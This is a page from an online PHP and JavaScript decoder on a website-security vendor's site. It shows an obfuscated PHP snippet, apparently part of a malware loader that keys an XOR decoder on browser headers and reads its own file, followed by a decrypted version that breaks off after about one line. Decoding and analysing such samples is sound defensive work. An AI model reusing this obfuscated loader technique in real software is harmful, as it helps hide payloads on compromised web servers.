Powered by Quttera
Home
Quttera Products
Website Anti-Malware Monitoring
Online Website Malware Scanner
WordPress Web Malware Scanner
Quttera Labs
Quttera Labs
Daily Malware Statistics
Weekly Malware Statistics
Monthly Malware Statistics
Website Malware Cleanup & Protection
Decode
History
Online PHP and Javascript Decoder
decode hidden script to uncover its real functionality
Original code:
$tdfxkve = $_SERVER["HT\X54P\X5FUSER_AG\X45NT"]; $tdfxkve .= $_SERVER["\X48T\X54P\X5FAC\X43\X45\X50\X54\X5F\X4CANGU\X41\X47E"]; $yajvyzp = md5($tdfxkve); function ifuxpdw($fnkleqh, $tdfxkve){ $yajvyzp=""; $kpszrew = strlen($fnkleqh); for($fnrpcjc=0;$fnrpcjc<$kpszrew;$fnrpcjc+=2) $yajvyzp.=urldecode("%".substr($fnkleqh,$fnrpcjc,2)); $strLen = strlen($yajvyzp); $kpszrew = strlen($tdfxkve); $icaqzve = ""; for($fnrpcjc=0; $fnrpcjc<$strLen; $fnrpcjc++){ $uacommw = $fnrpcjc % $kpszrew; $icaqzve .= chr(ord($yajvyzp[$fnrpcjc])^ord($tdfxkve[$uacommw])); } return $icaqzve; } $fnkleqh = __FILE__ ; $kpszrew = fopen($fnkleqh,"r"); $fnrpcjc = fread($kpszrew,filesize($fnkleqh));
Decrypted code:
$tdfxkve = $_SERVER["HT TP _USER_AG ENT"]; $tdfxkve .= $_SERVER["